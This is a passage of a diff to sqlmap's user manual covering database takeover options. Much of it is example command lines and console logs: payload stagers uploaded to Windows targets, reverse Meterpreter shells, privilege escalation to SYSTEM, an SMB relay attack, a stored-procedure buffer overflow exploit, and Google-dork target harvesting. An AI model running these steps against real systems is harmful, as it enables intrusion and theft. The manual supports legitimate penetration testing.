shellcode on the back-end database underlying +operating system? +[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default) +[2] Stand-alone payload stager (file system way) > 1 -[hh:mm:24] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131 -[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588 -[hh:mm:24] [INFO] which payload do you want to use? -[1] Reflective Meterpreter (default) -[2] PatchUp Meterpreter (only from Metasploit development revision 6742) -[3] Shell -[4] Reflective VNC -[5] PatchUp VNC (only from Metasploit development revision 6742) +[hh:mm:51] [INFO] creating Metasploit Framework 3 multi-stage shellcode +which connection type do you want to use? +[1] Reverse TCP: Connect back from the database host to this machine (default) +[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports +between the specified and 65535 +[3] Bind TCP: Listen on the database host for a connection > 1 -[hh:mm:24] [INFO] which payload encoding do you want to use? -[1] No Encoder -[2] Alpha2 Alphanumeric Mixedcase Encoder -[3] Alpha2 Alphanumeric Uppercase Encoder -[4] Avoid UTF8/tolower -[5] Call+4 Dword XOR Encoder -[6] Single-byte XOR Countdown Encoder -[7] Variable-length Fnstenv/mov Dword XOR Encoder -[8] Polymorphic Jump/Call XOR Additive Feedback Encoder -[9] Non-Alpha Encoder -[10] Non-Upper Encoder -[11] Polymorphic XOR Additive Feedback Encoder (default) -[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder -[13] Alpha2 Alphanumeric Unicode Uppercase Encoder -> 11 -[hh:mm:24] [INFO] creation in progress .................. done -[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1 -[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version -above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. -It might only slow down a bit the execution of sqlmap -[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe' -[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait.. -[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. +which is the local address? [172.16.213.1] +which local port number do you want to use? [47776] +which payload do you want to use? +[1] Meterpreter (default) +[2] Shell +[3] VNC +> 1 +[hh:mm:55] [INFO] creation in progress .............................................. done +[hh:mm:41] [INFO] running Metasploit Framework 3 command line interface locally, wait.. [*] Please wait while we load the module tree... -[*] Started bind handler +[*] Started reverse handler on 172.16.213.1:47776 [*] Starting the payload handler... -[*] Transmitting intermediate stager for over-sized stage...(216 bytes) -[*] Sending stage (718336 bytes) -[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 172.16.213.131:61588) +[hh:mm:22] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', wait.. +[*] Sending stage (748032 bytes) +[*] Meterpreter session 1 opened (172.16.213.1:47776 -> 172.16.213.128:2176) +meterpreter > Loading extension espia...success. +meterpreter > Loading extension incognito...success. meterpreter > Loading extension priv...success. -meterpreter > getuid -Server username: NT AUTHORITY\SYSTEM +meterpreter > Loading extension sniffer...success. +meterpreter > Computer: W2K3DEV +OS : Windows .NET Server (Build 3790, Service Pack 2). +Arch : x86 +Language: en_US +meterpreter > Server username: NT AUTHORITY\SYSTEM meterpreter > ipconfig MS TCP Loopback interface @@ -4750,79 +4839,76 @@ Netmask : 255.0.0.0 -VMware Accelerated AMD PCNet Adapter -Hardware MAC: 00:0c:29:29:ee:86 -IP Address : 172.16.213.131 +VMware Accelerated AMD PCNet Adapter #2 +Hardware MAC: 00:0c:29:86:69:1b +IP Address : 172.16.213.128 Netmask : 255.255.255.0 -meterpreter > pwd -C:\Program Files\MySQL\MySQL Server 5.0\Data meterpreter > exit + +[hh:mm:52] [INFO] cleaning up the database management system +do you want to remove UDF 'sys_bineval'? [Y/n] +do you want to remove UDF 'sys_exec'? [Y/n] +[hh:mm:54] [INFO] database management system cleanup finished +[hh:mm:54] [WARNING] remember that UDF dynamic-link library files and Metasploit related +files in the temporary folder saved on the file system can only be deleted manually

      By default MySQL on Windows runs as SYSTEM, however PostgreSQL -run as a low-privileged user postgres on both Windows and Linux. +runs as a low-privileged user postgres on both Windows and Linux. Microsoft SQL Server 2000 by default runs as SYSTEM, whereas Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK SERVICE and sometimes as LOCAL SERVICE. -It is possible to provide sqlmap with the --priv-esc option to -abuse Windows access tokens and escalate privileges to SYSTEM -within the Meterpreter session created if the underlying operating system -is not patched against Microsoft Security Bulletin -. -sqlmap performs the - -technique by uploading -local exploit and using it to call the Metasploit's payload stager -executable. sqlmap uses also the Metasploit's Meterpreter - -extension to abused Windows access tokens in conjunction to Churrasco -stand-alone exploit if the user wants so. - -

      -Note that this feature is not supported by sqlmap installed from the -DEB package because it relies on Churrasco, which is not explicitly free -software, so it has not been included in the package. - -

      -This technique is detailed in white paper -. +It is possible to provide sqlmap with the --priv-esc +option to perform a database process' user privilege escalation +via Metasploit's getsystem command which include, among others, +the technique () or via by using either Meterpreter's + extension or +() stand-alone executable as per user's choice.

      Example on a Microsoft SQL Server 2005 Service Pack 0 running as NETWORK SERVICE on the target: -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \ +$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1" \ --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc [...] -[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2000 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005 -[hh:mm:17] [INFO] testing stacked queries support on parameter 'name' -[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name' -[hh:mm:22] [INFO] testing if current user is DBA -[hh:mm:22] [INFO] retrieved: 1 -[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait.. -[hh:mm:29] [INFO] xp_cmdshell extended procedure is available -[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager +[hh:mm:47] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:52] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:52] [INFO] testing if current user is DBA +[hh:mm:52] [INFO] retrieved: 1 +[hh:mm:52] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:01] [INFO] xp_cmdshell extended procedure is available +[hh:mm:01] [INFO] creating Metasploit Framework 3 payload stager which connection type do you want to use? -[1] Bind TCP (default) -[2] Bind TCP (No NX) -[3] Reverse TCP -[4] Reverse TCP (No NX) -> 3 -which is the local address? [192.168.1.161] -which local port numer do you want to use? [61499] -[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload -that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' -extension to privilege escalate +[1] Reverse TCP: Connect back from the database host to this machine (default) +[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports +between the specified and 65535 +[3] Bind TCP: Listen on the database host for a connection +> 1 +which is the local address? [172.16.213.1] +which local port number do you want to use? [44780] +[hh:mm:52] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload +that can be used to escalate privileges, either via 'incognito' extension or via +'getsystem' command which payload encoding do you want to use? [1] No Encoder [2] Alpha2 Alphanumeric Mixedcase Encoder @@ -4838,39 +4924,35 @@ which payload encoding do you want to use? [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder [13] Alpha2 Alphanumeric Unicode Uppercase Encoder > -[hh:mm:58] [INFO] creation in progress .................. done -[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1 -[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version -above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. -It might only slow down a bit the execution of sqlmap -[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe' -[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no -Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito -extension to fail to list tokens +[hh:mm:53] [INFO] creation in progress ..... done +[hh:mm:58] [INFO] compression in progress . done +[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe' do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its -argument so that it will be started as SYSTEM? [Y/n] y -[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into -chunks, upload them and recreate the original file out of the binary chunks server-side, -wait.. -[hh:mm:22] [INFO] file chunk 1 written -[hh:mm:06] [INFO] file chunk 2 written -[hh:mm:06] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +argument so that it will be started as SYSTEM? [y/N] +[hh:mm:22] [INFO] running Metasploit Framework 3 command line interface locally, wait.. [*] Please wait while we load the module tree... -[*] Handler binding to LHOST 0.0.0.0 -[*] Started reverse handler +[*] Started reverse handler on 172.16.213.1:44780 [*] Starting the payload handler... [hh:mm:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. -[*] Transmitting intermediate stager for over-sized stage...(216 bytes) -[*] Sending stage (718336 bytes) -[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221) +[*] Sending stage (748032 bytes) +[*] Meterpreter session 1 opened (172.16.213.1:44780 -> 172.16.213.128:2185) meterpreter > -[hh:mm:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of -Access Tokens availables. Choose which user you want to impersonate by using incognito's -command 'impersonate_token' -Loading extension priv...success. +[hh:mm:34] [INFO] trying to escalate privileges using Meterpreter 'getsystem' command which +tries different techniques, including kitrap0d +[hh:mm:34] [INFO] displaying the list of Access Tokens availables. Choose which user you +want to impersonate by using incognito's command 'impersonate_token' if 'getsystem' did not +success to elevate privileges +Loading extension espia...success. meterpreter > Loading extension incognito...success. -meterpreter > Server username: NT AUTHORITY\SYSTEM +meterpreter > Loading extension priv...success. +meterpreter > Loading extension sniffer...success. +meterpreter > Computer: W2K3DEV +OS : Windows .NET Server (Build 3790, Service Pack 2). +Arch : x86 +Language: en_US +meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE +meterpreter > ...got system (via technique 4). meterpreter > Delegation Tokens Available ======================================== @@ -4878,16 +4960,34 @@ NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM W2K3DEV\Administrator -W2K3DEV\IUSR_WIN2003 +W2K3DEV\IUSR_W2K3STENSP0 W2K3DEV\postgres Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON +meterpreter > Server username: NT AUTHORITY\SYSTEM +meterpreter > ipconfig + +MS TCP Loopback interface +Hardware MAC: 00:00:00:00:00:00 +IP Address : 127.0.0.1 +Netmask : 255.0.0.0 + + + +VMware Accelerated AMD PCNet Adapter #2 +Hardware MAC: 00:0c:29:86:69:1b +IP Address : 172.16.213.128 +Netmask : 255.255.255.0 + + meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > exit + +[hh:mm:52] [INFO] cleaning up the database management system @@ -4897,31 +4997,30 @@ meterpreter > exit Options: --os-smbrelay, --priv-esc and --msf-path

      -If the back-end database management system runs as Administrator -and the underlying operating system is not patched against Microsoft -Security Bulletin , -sqlmap can abuse the universal naming convention (UNC) supported within -all database management systems to force the database server to initiate a -SMB connection with the attacker host, then perform a SMB authentication -relay attack in order to establish a high-privileged out-of-band TCP -stateful channel between the attacker host and the target database -server. +If the back-end database management system runs on Windows as +Administrator and the system is not patched against Microsoft +Security Bulletin , sqlmap can abuse the universal naming convention (UNC) +feature within any database management system to force the database server +to initiate a SMB connection with the attacker host, then perform a SMB +authentication relay attack in order to establish a high-privileged +out-of-band TCP stateful channel between the attacker host and +the target database server. sqlmap relies on 's SMB relay exploit to perform this attack, so you need -to have it already on your system - it's free and can be downloaded from the -homepage. -You need to run sqlmap as root user if you want to perform a SMB -relay attack because it will need to listen on a user-specified SMB TCP -port for incoming connection attempts. +name="Metasploit">'s SMB relay exploit to perform this attack. +You need to run sqlmap as a privileged user (e.g. root) if you +want to perform a SMB relay attack because it will need to listen on a +user-specified SMB TCP port for incoming connection attempts.

      -Note that this feature is not supported by sqlmap running on Windows platform -because Metasploit's msfconsole and msfcli are not supported on the native -Windows Ruby interpreter. +Note that this feature is not supported by sqlmap running on Windows +platform because it relies on Metasploit's msfpayload which is +not fully working on Windows.

      -This technique is detailed in white paper -. +This technique is detailed in the white paper +.

      Example on a Microsoft SQL Server 2005 Service Pack 0 running as @@ -4948,8 +5047,8 @@ send the NTLM session hash when connecting to a SMB service [3] Reverse TCP [4] Reverse TCP (No NX) > 1 -[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161 -[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131 +[hh:mm:16] [INFO] which is the local address? [172.16.213.161] 172.16.213.161 +[hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131 [hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907 [hh:mm:16] [INFO] which payload do you want to use? [1] Reflective Meterpreter (default) @@ -4980,27 +5079,27 @@ send the NTLM session hash when connecting to a SMB service =[ 168 aux resource> use windows/smb/smb_relay -resource> set SRVHOST 192.168.1.161 -SRVHOST => 192.168.1.161 +resource> set SRVHOST 172.16.213.161 +SRVHOST => 172.16.213.161 resource> set SRVPORT 139 SRVPORT => 139 resource> set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp resource> set LPORT 4907 LPORT => 4907 -resource> set RHOST 192.168.1.131 -RHOST => 192.168.1.131 +resource> set RHOST 172.16.213.131 +RHOST => 172.16.213.131 resource> exploit [*] Exploit running as background job. msf exploit(smb_relay) > [*] Started bind handler [*] Server started. -[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 +[*] Received 172.16.213.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 Service Pack 2 LM: -[*] Sending Access Denied to 192.168.1.131:3242 \ -[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows +[*] Sending Access Denied to 172.16.213.131:3242 \ +[*] Received 172.16.213.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows Server 2003 3790 Service Pack 2 LM: -[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator... +[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator... [*] AUTHENTICATED as W2K3DEV\Administrator... [*] Connecting to the ADMIN$ share... [*] Regenerating the payload... @@ -5015,26 +5114,26 @@ Server 2003 3790 Service Pack 2 LM: [*] Removing the service... [*] Closing service handle... [*] Deleting \wELRmcmd.exe... -[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator +[*] Sending Access Denied to 172.16.213.131:3242 W2K3DEV\Administrator [*] Transmitting intermediate stager for over-sized stage...(216 bytes) -[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 +[*] Received 172.16.213.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 Service Pack 2 LM: -[*] Sending Access Denied to 192.168.1.131:3244 \ -[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows +[*] Sending Access Denied to 172.16.213.131:3244 \ +[*] Received 172.16.213.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows Server 2003 3790 Service Pack 2 LM: -[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator... +[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator... [*] AUTHENTICATED as W2K3DEV\Administrator... -[*] Ignoring request from 192.168.1.131, attack already in progress. -[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator +[*] Ignoring request from 172.16.213.131, attack already in progress. +[*] Sending Access Denied to 172.16.213.131:3244 W2K3DEV\Administrator [*] Sending stage (718336 bytes) -[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907) +[*] Meterpreter session 1 opened (172.16.213.161:51813 -> 172.16.213.131:4907) Active sessions =============== Id Description Tunnel -- ----------- ------ - 1 Meterpreter 192.168.1.161:51813 -> 192.168.1.131:4907 + 1 Meterpreter 172.16.213.161:51813 -> 172.16.213.131:4907 msf exploit(smb_relay) > [*] Starting interaction with 1... @@ -5050,72 +5149,67 @@ msf exploit(smb_relay) > exit -Stored procedure buffer overflow exploitation +Database stored procedure heap-based buffer overflow exploit

      Options: --os-bof, --priv-esc and --msf-path

      -If the back-end database management system is not patched against Microsoft -Security Bulletin , -sqlmap can exploit the heap-based buffer overflow affecting -sp_replwritetovarbin stored procedure in order to establish an -out-of-band TCP stateful channel between the attacker host and the -target database server. +If the back-end database management system is Microsoft SQL Server not +patched against Microsoft Security Bulletin +, sqlmap can exploit the heap-based buffer overflow +affecting sp_replwritetovarbin stored procedure in order to +establish an out-of-band TCP stateful channel between the +attacker host and the target database server. sqlmap has its own exploit to trigger the vulnerability, but it relies on to -generate the shellcode used within the exploit, so you need to have it -already on your system - it's free and can be downloaded from the homepage. +generate the shellcode used within the exploit.

      -Note that this feature is not supported by sqlmap running on Windows platform -because Metasploit's msfconsole and msfcli are not supported on the native -Windows Ruby interpreter. +Note that this feature is not supported by sqlmap running on Windows +platform because it relies on Metasploit's msfcli which is not +available for Windows.

      -This technique is detailed in white paper -. +This technique is detailed in the white paper + and in the +slide deck .

      Example on a Microsoft SQL Server 2005 Service Pack 0 target: -$ sudo python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \ - --os-bof -v 1 --msf-path /home/inquis/software/metasploit +$ python sqlmap.py -u http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1 \ + --os-bof -v 1 --msf-path ~/software/metasploit [...] -[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server -web server operating system: Windows 2000 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005 -[hh:mm:09] [INFO] testing stacked queries support on parameter 'name' -[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name' -[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' +[hh:mm:51] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:56] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:56] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) -[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack -[hh:mm:14] [INFO] retrieved: 1 -[hh:mm:15] [INFO] retrieved: 1 -[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2 -[hh:mm:15] [INFO] testing if current user is DBA -[hh:mm:15] [INFO] retrieved: 1 -[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait.. -[hh:mm:21] [INFO] xp_cmdshell extended procedure is available -[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit +[hh:mm:56] [INFO] fingerprinting the back-end DBMS operating system version and service pack +[hh:mm:56] [INFO] retrieved: 1 +[hh:mm:58] [INFO] retrieved: 1 +[hh:mm:58] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2 +[hh:mm:58] [INFO] creating Metasploit Framework 3 multi-stage shellcode which connection type do you want to use? -[1] Bind TCP (default) -[2] Bind TCP (No NX) -[3] Reverse TCP -[4] Reverse TCP (No NX) +[1] Reverse TCP: Connect back from the database host to this machine (default) +[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports +between the specified and 65535 +[3] Bind TCP: Listen on the database host for a connection > -which is the back-end DBMS address? [192.168.1.131] -which remote port numer do you want to use? [39391] 62719 +which is the local address? [172.16.213.1] +which local port number do you want to use? [21380] which payload do you want to use? -[1] Reflective Meterpreter (default) -[2] PatchUp Meterpreter (only from Metasploit development revision 6742) -[3] Shell -[4] Reflective VNC -[5] PatchUp VNC (only from Metasploit development revision 6742) +[1] Meterpreter (default) +[2] Shell +[3] VNC > which payload encoding do you want to use? [1] No Encoder @@ -5132,25 +5226,39 @@ which payload encoding do you want to use? [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder [13] Alpha2 Alphanumeric Unicode Uppercase Encoder > -[hh:mm:50] [INFO] creation in progress .................. done -[hh:mm:08] [INFO] handling DEP -[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to -handle it -[hh:mm:08] [INFO] checking DEP system policy -[hh:mm:09] [INFO] retrieved: OPTIN -[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default -[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait.. -[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait.. +[hh:mm:16] [INFO] creation in progress .... done +[hh:mm:20] [INFO] running Metasploit Framework 3 command line interface locally, wait.. [*] Please wait while we load the module tree... -[*] Started bind handler +[*] Started reverse handler on 172.16.213.1:21380 [*] Starting the payload handler... -[*] Transmitting intermediate stager for over-sized stage...(216 bytes) -[*] Sending stage (718336 bytes) -[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719) +[hh:mm:27] [INFO] triggering the buffer overflow vulnerability, wait.. +[*] Sending stage (748032 bytes) +[*] Meterpreter session 1 opened (172.16.213.1:21380 -> 172.16.213.128:12062) +meterpreter > Loading extension espia...success. +meterpreter > Loading extension incognito...success. meterpreter > Loading extension priv...success. -meterpreter > getuid -Server username: NT AUTHORITY\NETWORK SERVICE +meterpreter > Loading extension sniffer...success. +meterpreter > Computer: W2K3DEV +OS : Windows .NET Server (Build 3790, Service Pack 2). +Arch : x86 +Language: en_US +meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE +meterpreter > ipconfig + +MS TCP Loopback interface +Hardware MAC: 00:00:00:00:00:00 +IP Address : 127.0.0.1 +Netmask : 255.0.0.0 + + + +VMware Accelerated AMD PCNet Adapter #2 +Hardware MAC: 00:0c:29:86:69:1b +IP Address : 172.16.213.128 +Netmask : 255.255.255.0 + + meterpreter > exit @@ -5161,64 +5269,82 @@ meterpreter > exit

      Option: --reg-read -#TODO + +

      +TODO Write a Windows registry key value data

      Option: --reg-add -#TODO + +

      +TODO Delete a Windows registry key value

      Option: --reg-del -#TODO + +

      +TODO Windows registry key

      Option: --reg-key -#TODO + +

      +TODO Windows registry key value

      Option: --reg-value -#TODO + +

      +TODO Windows registry key value data

      Option: --reg-data -#TODO + +

      +TODO Windows registry key value type

      Option: --reg-type -#TODO + +

      +TODO Miscellaneous -Save and resume all data retrieved on a session file +Session file: save and resume all data retrieved

      Option: -s

      -It is possible to log all queries and their output into a text file while +By default sqlmap logs all queries and their output into a text file while performing whatever request, both in blind SQL injection and in inband SQL injection. This is useful if you stop the injection and resume it after some time. +

      +The default session file is output/hostname/session, but you can +change its path with the -s option. +

      Example on a PostgreSQL 8.3.5 target: @@ -5310,11 +5436,13 @@ banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real Option: --flush-session

      -As you are already familiar with the concept of a session file from description -of option -s, it's good to know that you can flush the content of that -same file using option --flush-session. In that way you can -avoid caching mechanisms implemented in sqlmap. Other possible way is the -manual removing of session file(s) from output directory. +As you are already familiar with the concept of a session file from the +description of option -s, it is good to know that you can flush +the content of that same file using option --flush-session. +This way you can avoid caching mechanisms implemented by default in +sqlmap. Other possible way is the manual removing of session file(s), +sqlmap.log in the example above, or the default +output/hostname/session if -s is not provided. Estimated time of arrival @@ -5387,13 +5515,13 @@ then estimates the time of arrival, shows the progress in percentage and counts the number of retrieved query output characters. -Use google dork results from specified page number +Use Google dork results from specified page number

      Option: --gpage

      -Default sqlmap behavior with option -g is to do a google +Default sqlmap behavior with option -g is to do a Google search and use resulting urls from first (100) result page for further sql injection testing. In combination with this option you can specify some other page other than the first one for retrieving target urls. @@ -5407,14 +5535,15 @@ $ python sqlmap.py -g "ext:php login" --gpage 3 -v 1 [hh:mm:14] [INFO] first request to Google to get the session cookie [hh:mm:14] [INFO] using Google result page #3 -[hh:mm:14] [INFO] sqlmap got 100 results for your Google dork expression, 89 of them are testable targets +[hh:mm:14] [INFO] sqlmap got 100 results for your Google dork expression, 89 of them are +testable targets [hh:mm:15] [INFO] sqlmap got a total of 89 targets url 1: GET http://www.XXX.com/index.php?pageid=login do you want to test this url? [Y/n/q] > y [hh:mm:17] [INFO] testing url http://www.XXX.com/index.php?pageid=login -[hh:mm:17] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/www.XXX.com/session' as session file +[hh:mm:17] [INFO] using '/home/inquis/sqlmap/output/www.XXX.com/session' as session file [hh:mm:17] [INFO] testing connection to the target url [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds [hh:mm:19] [INFO] url is stable @@ -5427,14 +5556,14 @@ do you want to test this url? [Y/n/q] -Update sqlmap +Update sqlmap

      Option: --update

      -Using this option you can update the program to the latest version -directly from source repository together with the latest +Using this option you can update the program to the latest version +directly from the Subversion repository along with the latest Microsoft SQL Server XML versions file from Chip Andrews' . @@ -5444,14 +5573,19 @@ $ python sqlmap.py --update [...] [hh:mm:27] [INFO] updating sqlmap to latest development version from the subversion repository -[hh:mm:28] [INFO] updated to the latest revision 1356 +[hh:mm:28] [INFO] updated to the latest revision XXXX [hh:mm:29] [INFO] updating Microsoft SQL Server XML versions file [hh:mm:33] [INFO] no new Microsoft SQL Server versions since the last update [...] +

      +The Debian and Red Hat installation packages (deb and rpm) as well as the +Windows binary package (exe) can not be used to update sqlmap. You need +a source package (gzip, bzip2 or zip) to use this feature. -Save options on a configuration INI file + +Save options in a configuration INI file

      Option: --save @@ -5467,7 +5601,7 @@ Example on a PostgreSQL 8.3.5 target: $ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \ -v 1 --save -[hh:mm:33] [INFO] saved command line options on '/software/sqlmap/sqlmap-SAUbs.conf' +[hh:mm:33] [INFO] saved command line options on '/home/inquis/sqlmap/sqlmap-SAUbs.conf' configuration file [hh:mm:33] [INFO] testing connection to the target url [hh:mm:33] [INFO] testing if the url is stable, wait a few seconds @@ -5597,13 +5731,12 @@ timesec = 5

      The file is a valid sqlmap configuration INI file. You can edit the configuration options as you wish and pass it to sqlmap -with the -c option as explained above in section 5.2: +with the -c option as explained above in section 5.2.5: -$ python sqlmap.py -c "sqlmap-SAUbs.conf" +$ python sqlmap.py -c sqlmap-SAUbs.conf [...] - banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Ubuntu 4.3.2-1ubuntu11) 4.3.2' @@ -5615,8 +5748,8 @@ banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real Option: --batch

      -If you want sqlmap to run as a batch tool, without any users interaction -when a choice has to be done, you can force it by using --batch +If you want sqlmap to run as a batch tool, without any user's interaction +when sqlmap requires it, you can force it by using --batch option, and leave sqlmap to go for a default behaviour.

      @@ -5626,6 +5759,7 @@ Example on a MySQL 5.0.67 target: $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_str.php?id=1&name=luther" \ --batch -v 1 +[...] [hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic [hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic [hh:mm:22] [INFO] GET parameter 'id' is dynamic @@ -5654,19 +5788,19 @@ back-end DBMS: MySQL >= 5.0.0

      -As you can see, sqlmap by default automatically chooses to inject payload -to the first vulnerable parameter. +As you can see, sqlmap by default chose the injection payload to the first +vulnerable parameter. -Clean up the DBMS by sqlmap specific UDF and tables +Cleanup the DBMS by sqlmap specific UDF(s) and table(s)

      Option: --cleanup

      It is recommended to clean up the back-end database management system from -sqlmap temporary tables and created user-defined functions when you are -done with owning the underlying operating system or file system. +sqlmap temporary table(s) and created user-defined function(s) when you +are done with owning the underlying operating system or file system.

      Example on a PostgreSQL 8.3.5 target: